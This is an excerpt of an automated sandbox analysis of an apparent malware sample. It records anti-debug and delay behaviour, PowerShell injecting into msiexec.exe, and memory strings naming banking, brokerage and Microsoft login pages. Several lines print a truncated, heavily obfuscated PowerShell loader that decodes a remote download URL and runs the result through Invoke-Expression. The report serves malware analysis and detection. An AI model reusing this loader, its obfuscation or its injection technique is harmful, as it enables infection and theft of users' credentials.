Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 595109 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 594988 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 594859 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 594743 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 594625 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 594515 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 594406 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Thread delayed: delay time: 594293 Jump to behavior
Source: msiexec.exe, 00000008.00000002.2596938789.0000000024AFB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: msiexec.exe, 00000008.00000002.2596938789.0000000024AFB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: msiexec.exe, 00000008.00000002.2596938789.0000000024AFB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: msiexec.exe, 00000008.00000002.2596938789.0000000024AFB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: msiexec.exe, 00000008.00000002.2596938789.0000000024AFB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: wscript.exe, 00000000.00000003.1341414760.0000020B00C0D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\&
Source: msiexec.exe, 00000008.00000002.2596938789.0000000024AFB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696492231s
Source: msiexec.exe, 00000008.00000002.2596938789.0000000024AFB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: msiexec.exe, 00000008.00000002.2596938789.0000000024AFB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696492231
Source: msiexec.exe, 00000008.00000002.2596938789.0000000024AFB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: msiexec.exe, 00000008.00000002.2596938789.0000000024AFB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: wscript.exe, 00000000.00000003.1310601389.0000020B02AB6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1342854505.0000020B00C1F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1341504506.0000020B02AB6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1310547788.0000020B00C02000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1309442096.0000020B02AB6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1341717301.0000020B02AB6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1310965896.0000020B00C2A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1341227470.0000020B00C13000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1341647462.0000020B00C1E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1343000144.0000020B02AB6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: msiexec.exe, 00000008.00000002.2596938789.0000000024AFB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: msiexec.exe, 00000008.00000002.2596938789.0000000024AFB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: msiexec.exe, 00000008.00000002.2596938789.0000000024AFB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: msiexec.exe, 00000008.00000002.2596938789.0000000024AFB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: msiexec.exe, 00000008.00000002.2596938789.0000000024AFB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: msiexec.exe, 00000008.00000002.2596938789.0000000024AFB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696492231f
Source: msiexec.exe, 00000008.00000002.2596938789.0000000024AFB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696492231
Source: powershell.exe, 00000003.00000002.1556524743.000002673FA05000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW.q%SystemRoot%\system32\mswsock.dlllpeprster ',uftn$DenatGOutsmL Misto Sk lb Aft aPretrLfl.vv:S.imeLNiel SboppeBGran LCompraUnde D Biote.elev2Detin5 Sk l4Y.erl=Sabba$PredeBAtta eGarniHB omaABor eV SmokIQuibbOKommauIntuiRRapheIO stiSBilfoTAarso.ReindsOpretpA,mitQ
Source: msiexec.exe, 00000008.00000002.2596938789.0000000024AFB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696492231j
Source: msiexec.exe, 00000008.00000002.2596938789.0000000024AFB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: msiexec.exe, 00000008.00000002.2596938789.0000000024AFB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: msiexec.exe, 00000008.00000002.2596938789.0000000024AFB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: msiexec.exe, 00000008.00000002.2596938789.0000000024AFB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: msiexec.exe, 00000008.00000002.2596938789.0000000024AFB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696492231o
Source: msiexec.exe, 00000008.00000002.2596938789.0000000024AFB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: msiexec.exe, 00000008.00000002.2596938789.0000000024AFB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: wscript.exe, 00000000.00000003.1341974842.0000020B00B80000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&04=5
Source: msiexec.exe, 00000008.00000002.2596938789.0000000024AFB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: msiexec.exe, 00000008.00000002.2596938789.0000000024AFB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: msiexec.exe, 00000008.00000002.2596938789.0000000024AFB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: msiexec.exe, 00000008.00000002.2596938789.0000000024AFB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
Source: msiexec.exe, 00000008.00000002.2596938789.0000000024AFB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: msiexec.exe, 00000008.00000002.2596938789.0000000024AFB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696492231]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_00C1D6CC LdrInitializeThunk,LdrInitializeThunk, 6_2_00C1D6CC

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exe Jump to behavior
Source: Yara match File source: amsi64_7620.amsi.csv, type: OTHER
Source: Yara match File source: Process Memory Space: powershell.exe PID: 7620, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 8036, type: MEMORYSTR
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread APC queued: target process: C:\Windows\SysWOW64\msiexec.exe Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\msiexec.exe base: 4190000 Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Fllesboet Ramshorns Rhinaria Overdresses Facetterende #>;$Overophedendes='strudsfjerenes';<#Nonneordenen Overspndtes brisantgranaters Galactosuria Badestrande Tagdkningen #>;$Prambelet19=$Forngternes+$host.UI;If ($Prambelet19) {$Svinebstets++;}function Hjlpeprster($Forecastors){$Dihydroxy95=$Barberfish+$Forecastors.'Length'-$Svinebstets; for( $Vandplantes24=5;$Vandplantes24 -lt $Dihydroxy95;$Vandplantes24+=6){$Tillamook='Odorlessness';$Chairway+=$Forecastors[$Vandplantes24];$Dispatch48='Knivblade';}$Chairway;}function Snoose($Spektrenes){ & ($Tvillingsstrene) ($Spektrenes);}$Weakly=Hjlpeprster 'T umbMTownloferiezKrubiiInterlUnwellFrihaaergat/Cornu5Dimho.Fenyl0Drivt Bedri( O teWUnderi urinFe ied SubdoE,siswCont sUrb n Hi.hfN LuxuTvest, Bomba1Flles0C,clo.Bef e0V vob;Kvste TestWRadagiToernnStvfn6 albi4 otr; N,ds TinktxSousa6Bylde4Reip ;Vre,s AutovrM riovPendu:.resa1Phono2Dairy1 List. Duru0Di pl)Stat Tra,eGMicroePlac cPopulkOversoa.kom/Evasi2Octan0 Anti1 Ital0Retst0Vel.e1T.ger0Am ro1Intr totaF prioiJa,thrLoinse D,rifFormaoThe,oxBru,a/ ,ars1La it2 Uva,1Etage. 
nsuf0Noni ';$Erythrocytes=Hjlpeprster ' hyp uBilm.sUdaaneOcta.r dbyg-AssesARapseGGrunde eglin GoattLeche ';$Behaviourist=Hjlpeprster 'ArchehStrant LdertHollop Aksis .imm:resgs/Wi te/Frekvd Drg r InviiHov dvKlosteMrkel.PhilagFallioCystooBudlig Fa.slSup.reLidel.friticDentaoPro,rmSanda/UnderuAarspcExtra?Eftere Gen.xUdsulpOeje oCl.irrDesigtSydga=RednidSita oKondiw aragn ulnelProgro dungaSuprad Deno&AnopliEmbusdPlak =Terre1AfvanvHoneymMagikFovertR Seto9KadenyKvaded U dyuCecilHDisco7.kopuBFr,sk2Sa.rulTrib.OU.tagF Pro ODraugQ apsoq PochcSo nkZIna,nV AlpeCSgekoVHybriG ind4 Ekspw.ilhacGrundtlserkOEu ukCrhipibSldecIOver ';$Brkop=Hjlpeprster 'Fleck>delin ';$Tvillingsstrene=Hjlpeprster 'Lith INoncoeF emmx unds ';$Eaters='Frog';$Uptore='\Kommandocentralens.Qua';Snoose (Hjlpeprster 'gaase$Undfag BibrLFlokdoMi libLsgreAAmo eladstr: ftrdHdowntiEjnerLdrivedAcy aeHep tdSte neSulp.=Rigou$Jettee TrotN nscrvP efe:PolycA RepoPProcaP UnindSelv aMajbrtNonmiARepla+B.nga$Aldisu.agskPCol.qT BefiOUnre RP,enoeSubhe ');Snoose (Hjlpeprster ',uftn$DenatGOutsmL Misto Sk lb Aft aPretrLfl.vv:S.imeLNiel SboppeBGran LCompraUnde D Biote.elev2Detin5 Sk l4Y.erl=Sabba$PredeBAtta eGarniHB omaABor eV SmokIQuibbOKommauIntuiRRapheIO stiSBilfoTAarso.ReindsOpretpA,mitlTa kei ,ibatHulsv(Docog$ PlacBCapitRpulldksapphoSkralPBasil) olyt ');Snoose (Hjlpeprster 'Flder[Tanken pejlEFa edTImple. easesSpindEUnprorFo ekVTabe iL ndbc EvinEForldpPlan,obaredILydtbNDa atTCykelmcompraWe neNBortfa .onrgKnapnE DeikrC cil] Folk:Digit:TrykksMaltreSmoldcKdkonUpen.erComm IBuscht RablYCivilpLov iRf,ugtoHenkoTUnproopaatac StaroOvernLPhi.a Efter=Na rv Teks[ esteNantite kibtJage .InstrsCarpoeToccaCC.pidura,errMenthi olumt ,ureYSemidpBoundROphavo Slagt EffiO.edthC Stvko TangL,ymniTo erfypol tP nfaEBeslu]Dilet:Filli:Dekl,t,edekL Omd Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe" Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" " <#fllesboet ramshorns rhinaria overdresses facetterende #>;$overophedendes='strudsfjerenes';<#nonneordenen overspndtes brisantgranaters galactosuria badestrande tagdkningen #>;$prambelet19=$forngternes+$host.ui;if ($prambelet19) {$svinebstets++;}function hjlpeprster($forecastors){$dihydroxy95=$barberfish+$forecastors.'length'-$svinebstets; for( $vandplantes24=5;$vandplantes24 -lt $dihydroxy95;$vandplantes24+=6){$tillamook='odorlessness';$chairway+=$forecastors[$vandplantes24];$dispatch48='knivblade';}$chairway;}function snoose($spektrenes){ & ($tvillingsstrene) ($spektrenes);}$weakly=hjlpeprster 't umbmtownloferiezkrubiiinterlunwellfrihaaergat/cornu5dimho.fenyl0drivt bedri( o tewunderi urinfe ied subdoe,siswcont surb n hi.hfn luxutvest, bomba1flles0c,clo.bef e0v vob;kvste testwradagitoernnstvfn6 albi4 otr; n,ds tinktxsousa6bylde4reip ;vre,s autovrm riovpendu:.resa1phono2dairy1 list. duru0di pl)stat tra,egmicroeplac cpopulkoversoa.kom/evasi2octan0 anti1 ital0retst0vel.e1t.ger0am ro1intr totaf prioija,thrloinse d,rifformaothe,oxbru,a/ ,ars1la it2 uva,1etage. 
nsuf0noni ';$erythrocytes=hjlpeprster ' hyp ubilm.sudaaneocta.r dbyg-assesarapseggrunde eglin goattleche ';$behaviourist=hjlpeprster 'archehstrant lderthollop aksis .imm:resgs/wi te/frekvd drg r inviihov dvklostemrkel.philagfalliocystoobudlig fa.slsup.relidel.friticdentaopro,rmsanda/underuaarspcextra?eftere gen.xudsulpoeje ocl.irrdesigtsydga=rednidsita okondiw aragn ulnelprogro dungasuprad deno&anopliembusdplak =terre1afvanvhoneymmagikfovertr seto9kadenykvaded u dyucecilhdisco7.kopubfr,sk2sa.rultrib.ou.tagf pro odraugq apsoq pochcso nkzina,nv alpecsgekovhybrig ind4 ekspw.ilhacgrundtlserkoeu ukcrhipibsldeciover ';$brkop=hjlpeprster 'fleck>delin ';$tvillingsstrene=hjlpeprster 'lith inoncoef emmx unds ';$eaters='frog';$uptore='\kommandocentralens.qua';snoose (hjlpeprster 'gaase$undfag bibrlflokdomi liblsgreaamo eladstr: ftrdhdowntiejnerldrivedacy aehep tdste nesulp.=rigou$jettee trotn nscrvp efe:polyca repopprocap unindselv amajbrtnonmiarepla+b.nga$aldisu.agskpcol.qt befiounre rp,enoesubhe ');snoose (hjlpeprster ',uftn$denatgoutsml misto sk lb aft apretrlfl.vv:s.imelniel sboppebgran lcompraunde d biote.elev2detin5 sk l4y.erl=sabba$predebatta egarnihb omaabor ev smokiquibbokommauintuirrapheio stisbilfotaarso.reindsopretpa,mitlta kei ,ibathulsv(docog$ placbcapitrpulldksapphoskralpbasil) olyt ');snoose (hjlpeprster 'flder[tanken pejlefa edtimple. easesspindeunprorfo ekvtabe il ndbc evineforldpplan,obaredilydtbnda attcykelmcomprawe nenbortfa .onrgknapne deikrc cil] folk:digit:trykksmaltresmoldckdkonupen.ercomm ibuscht rablycivilplov irf,ugtohenkotunproopaatac staroovernlphi.a efter=na rv teks[ estenantite kibtjage .instrscarpoetoccacc.pidura,errmenthi olumt ,ureysemidpboundrophavo slagt effio.edthc stvko tangl,ymnito erfypol tp nfaebeslu]dilet:filli:dekl,t,edekl omd
Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" " <#fllesboet ramshorns rhinaria overdresses facetterende #>;$overophedendes='strudsfjerenes';<#nonneordenen overspndtes brisantgranaters galactosuria badestrande tagdkningen #>;$prambelet19=$forngternes+$host.ui;if ($prambelet19) {$svinebstets++;}function hjlpeprster($forecastors){$dihydroxy95=$barberfish+$forecastors.'length'-$svinebstets; for( $vandplantes24=5;$vandplantes24 -lt $dihydroxy95;$vandplantes24+=6){$tillamook='odorlessness';$chairway+=$forecastors[$vandplantes24];$dispatch48='knivblade';}$chairway;}function snoose($spektrenes){ & ($tvillingsstrene) ($spektrenes);}$weakly=hjlpeprster 't umbmtownloferiezkrubiiinterlunwellfrihaaergat/cornu5dimho.fenyl0drivt bedri( o tewunderi urinfe ied subdoe,siswcont surb n hi.hfn luxutvest, bomba1flles0c,clo.bef e0v vob;kvste testwradagitoernnstvfn6 albi4 otr; n,ds tinktxsousa6bylde4reip ;vre,s autovrm riovpendu:.resa1phono2dairy1 list. duru0di pl)stat tra,egmicroeplac cpopulkoversoa.kom/evasi2octan0 anti1 ital0retst0vel.e1t.ger0am ro1intr totaf prioija,thrloinse d,rifformaothe,oxbru,a/ ,ars1la it2 uva,1etage. 
nsuf0noni ';$erythrocytes=hjlpeprster ' hyp ubilm.sudaaneocta.r dbyg-assesarapseggrunde eglin goattleche ';$behaviourist=hjlpeprster 'archehstrant lderthollop aksis .imm:resgs/wi te/frekvd drg r inviihov dvklostemrkel.philagfalliocystoobudlig fa.slsup.relidel.friticdentaopro,rmsanda/underuaarspcextra?eftere gen.xudsulpoeje ocl.irrdesigtsydga=rednidsita okondiw aragn ulnelprogro dungasuprad deno&anopliembusdplak =terre1afvanvhoneymmagikfovertr seto9kadenykvaded u dyucecilhdisco7.kopubfr,sk2sa.rultrib.ou.tagf pro odraugq apsoq pochcso nkzina,nv alpecsgekovhybrig ind4 ekspw.ilhacgrundtlserkoeu ukcrhipibsldeciover ';$brkop=hjlpeprster 'fleck>delin ';$tvillingsstrene=hjlpeprster 'lith inoncoef emmx unds ';$eaters='frog';$uptore='\kommandocentralens.qua';snoose (hjlpeprster 'gaase$undfag bibrlflokdomi liblsgreaamo eladstr: ftrdhdowntiejnerldrivedacy aehep tdste nesulp.=rigou$jettee trotn nscrvp efe:polyca repopprocap unindselv amajbrtnonmiarepla+b.nga$aldisu.agskpcol.qt befiounre rp,enoesubhe ');snoose (hjlpeprster ',uftn$denatgoutsml misto sk lb aft apretrlfl.vv:s.imelniel sboppebgran lcompraunde d biote.elev2detin5 sk l4y.erl=sabba$predebatta egarnihb omaabor ev smokiquibbokommauintuirrapheio stisbilfotaarso.reindsopretpa,mitlta kei ,ibathulsv(docog$ placbcapitrpulldksapphoskralpbasil) olyt ');snoose (hjlpeprster 'flder[tanken pejlefa edtimple. easesspindeunprorfo ekvtabe il ndbc evineforldpplan,obaredilydtbnda attcykelmcomprawe nenbortfa .onrgknapne deikrc cil] folk:digit:trykksmaltresmoldckdkonupen.ercomm ibuscht rablycivilplov irf,ugtohenkotunproopaatac staroovernlphi.a efter=na rv teks[ estenantite kibtjage .instrscarpoetoccacc.pidura,errmenthi olumt ,ureysemidpboundrophavo slagt effio.edthc stvko tangl,ymnito erfypol tp nfaebeslu]dilet:filli:dekl,t,edekl omd
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" " <#fllesboet ramshorns rhinaria overdresses facetterende #>;$overophedendes='strudsfjerenes';<#nonneordenen overspndtes brisantgranaters galactosuria badestrande tagdkningen #>;$prambelet19=$forngternes+$host.ui;if ($prambelet19) {$svinebstets++;}function hjlpeprster($forecastors){$dihydroxy95=$barberfish+$forecastors.'length'-$svinebstets; for( $vandplantes24=5;$vandplantes24 -lt $dihydroxy95;$vandplantes24+=6){$tillamook='odorlessness';$chairway+=$forecastors[$vandplantes24];$dispatch48='knivblade';}$chairway;}function snoose($spektrenes){ & ($tvillingsstrene) ($spektrenes);}$weakly=hjlpeprster 't umbmtownloferiezkrubiiinterlunwellfrihaaergat/cornu5dimho.fenyl0drivt bedri( o tewunderi urinfe ied subdoe,siswcont surb n hi.hfn luxutvest, bomba1flles0c,clo.bef e0v vob;kvste testwradagitoernnstvfn6 albi4 otr; n,ds tinktxsousa6bylde4reip ;vre,s autovrm riovpendu:.resa1phono2dairy1 list. duru0di pl)stat tra,egmicroeplac cpopulkoversoa.kom/evasi2octan0 anti1 ital0retst0vel.e1t.ger0am ro1intr totaf prioija,thrloinse d,rifformaothe,oxbru,a/ ,ars1la it2 uva,1etage. 
nsuf0noni ';$erythrocytes=hjlpeprster ' hyp ubilm.sudaaneocta.r dbyg-assesarapseggrunde eglin goattleche ';$behaviourist=hjlpeprster 'archehstrant lderthollop aksis .imm:resgs/wi te/frekvd drg r inviihov dvklostemrkel.philagfalliocystoobudlig fa.slsup.relidel.friticdentaopro,rmsanda/underuaarspcextra?eftere gen.xudsulpoeje ocl.irrdesigtsydga=rednidsita okondiw aragn ulnelprogro dungasuprad deno&anopliembusdplak =terre1afvanvhoneymmagikfovertr seto9kadenykvaded u dyucecilhdisco7.kopubfr,sk2sa.rultrib.ou.tagf pro odraugq apsoq pochcso nkzina,nv alpecsgekovhybrig ind4 ekspw.ilhacgrundtlserkoeu ukcrhipibsldeciover ';$brkop=hjlpeprster 'fleck>delin ';$tvillingsstrene=hjlpeprster 'lith inoncoef emmx unds ';$eaters='frog';$uptore='\kommandocentralens.qua';snoose (hjlpeprster 'gaase$undfag bibrlflokdomi liblsgreaamo eladstr: ftrdhdowntiejnerldrivedacy aehep tdste nesulp.=rigou$jettee trotn nscrvp efe:polyca repopprocap unindselv amajbrtnonmiarepla+b.nga$aldisu.agskpcol.qt befiounre rp,enoesubhe ');snoose (hjlpeprster ',uftn$denatgoutsml misto sk lb aft apretrlfl.vv:s.imelniel sboppebgran lcompraunde d biote.elev2detin5 sk l4y.erl=sabba$predebatta egarnihb omaabor ev smokiquibbokommauintuirrapheio stisbilfotaarso.reindsopretpa,mitlta kei ,ibathulsv(docog$ placbcapitrpulldksapphoskralpbasil) olyt ');snoose (hjlpeprster 'flder[tanken pejlefa edtimple. easesspindeunprorfo ekvtabe il ndbc evineforldpplan,obaredilydtbnda attcykelmcomprawe nenbortfa .onrgknapne deikrc cil] folk:digit:trykksmaltresmoldckdkonupen.ercomm ibuscht rablycivilplov irf,ugtohenkotunproopaatac staroovernlphi.a efter=na rv teks[ estenantite kibtjage .instrscarpoetoccacc.pidura,errmenthi olumt ,ureysemidpboundrophavo slagt effio.edthc stvko tangl,ymnito erfypol tp nfaebeslu]dilet:filli:dekl,t,edekl omd Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
